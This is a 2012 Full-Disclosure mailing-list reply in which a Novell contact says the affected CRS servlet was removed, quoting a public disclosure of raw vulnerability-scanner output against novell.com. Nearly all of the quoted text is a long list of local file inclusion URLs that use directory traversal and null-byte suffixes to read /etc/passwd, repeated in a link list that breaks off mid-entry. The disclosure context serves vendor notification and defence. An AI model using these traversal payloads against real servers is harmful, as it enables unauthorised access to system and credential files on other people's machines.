Re: [Full-disclosure] Vulnerability in Novell website.

Mon, 13 Feb 2012 08:08:40 -0800 

Hi,

We have escalated this within Novell and the CRS servlet got removed
last week on the day of the report.

Ciao, Marcus

On Mon, Feb 13, 2012 at 04:36:44PM +0100, Team wrote:
>   
> 
> Hello :-) 
> 
> I sent email stating the problem for the company,
> waited a few days and got no response, so I'm making the vulnerability
> public: 
> 
> Scan date: 2-2-2012
> 13:33:54
> ===================================================================================================
> |
> Domain: http://www.novell.com/ [1]
> | Server: Apache
> | IP:
> 130.57.5.25
> ===================================================================================================
> ...
> 
> 
> | LFI:
> | [+] Vul[1] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00
> [2]
> | [+] Vul[2] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.jpg
> [3]
> | [+] Vul[3] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.html
> [4]
> | [+] Vul[4] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.css
> [5]
> | [+] Vul[5] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.php
> [6]
> | [+] Vul[6] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.inc
> [7]
> | [+] Vul[7] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.txt
> [8]
> | [+] Vul[8] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=../../../../../../../../../../etc/passwd%00.png
> [9]
> | [+] Vul[9] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=//../../../../../../../../etc/passwd%00
> [10]
> | [+] Vul[10] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=//../../../../../../../../etc/passwd%00en
> [11]
> | [+] Vul[11] [LFI]
> http://www.novell.com/servlet/CRS?Action=Start+Search&video=true&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00
> [12]
> | [+] Vul[12] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [13]
> | [+] Vul[13] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [14]
> | [+] Vul[14] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [15]
> | [+] Vul[15] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [16]
> | [+] Vul[16] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [17]
> | [+] Vul[17] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [18]
> | [+] Vul[18] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [19]
> | [+] Vul[19] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [20]
> | [+] Vul[20] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [21]
> | [+] Vul[21] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00en&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [22]
> | [+] Vul[22] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&;
> [23]
> | [+] Vul[23] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [24]
> | [+] Vul[24] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [25]
> | [+] Vul[25] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [26]
> | [+] Vul[26] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [27]
> | [+] Vul[27] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [28]
> | [+] Vul[28] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [29]
> | [+] Vul[29] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [30]
> | [+] Vul[30] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [31]
> | [+] Vul[31] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [32]
> | [+] Vul[32] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00en&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [33]
> | [+] Vul[33] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=25
> [34]
> | [+] Vul[34] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [35]
> | [+] Vul[35] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [36]
> | [+] Vul[36] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [37]
> | [+] Vul[37] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [38]
> | [+] Vul[38] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [39]
> | [+] Vul[39] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [40]
> | [+] Vul[40] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [41]
> | [+] Vul[41] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [42]
> | [+] Vul[42] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [43]
> | [+] Vul[43] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00en&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [44]
> | [+] Vul[44] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=1
> [45]
> | [+] Vul[45] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [46]
> | [+] Vul[46] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.jpg&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [47]
> | [+] Vul[47] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.html&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [48]
> | [+] Vul[48] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.css&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [49]
> | [+] Vul[49] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.php&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [50]
> | [+] Vul[50] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.txt&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [51]
> | [+] Vul[51] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.inc&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [52]
> | [+] Vul[52] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=../../../../../../../../../../etc/passwd%00.png&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [53]
> | [+] Vul[53] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [54]
> | [+] Vul[54] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=//../../../../../../../../etc/passwd%00en&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [55]
> | [+] Vul[55] [LFI]
> http://www.novell.com/servlet/CRS?reference_name=&-op=%25&Action=Start+Search&Submit=Start+Search&source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00&full_text_limit=showcase_verbiage+%2C+press_release&MaxRows=0&&&language_id=0&region_id=0&country_id=0&industry=2
> [56]
> | 
> 
> .......
> 
> 
> ===================================================================================================
> 
> 
> Scan end date: 2-2-2012 15:4:27 
> 
> -- 
> Uniscan Team.
>  
> 
> 
> Links:
> ------
> [1] http://www.novell.com/
> [2]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00
> [3]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.jpg
> [4]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.html
> [5]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.css
> [6]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.php
> [7]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.inc
> [8]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.txt
> [9]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=../../../../../../../../../../etc/passwd%00.png
> [10]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=//../../../../../../../../etc/passwd%00
> [11]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=//../../../../../../../../etc/passwd%00en
> [12]
> http://www.novell.com/servlet/CRS?Action=Start+Search|+|amp|+|video=true|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00
> [13]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [14]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [15]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [16]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [17]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [18]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [19]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [20]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [21]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [22]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00en|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [23]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+|
> [24]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [25]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [26]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [27]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [28]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [29]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [30]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [31]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [32]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [33]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00en|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [34]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=25
> [35]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [36]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [37]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [38]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [39]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [40]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [41]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [42]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [43]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [44]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00en|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [45]
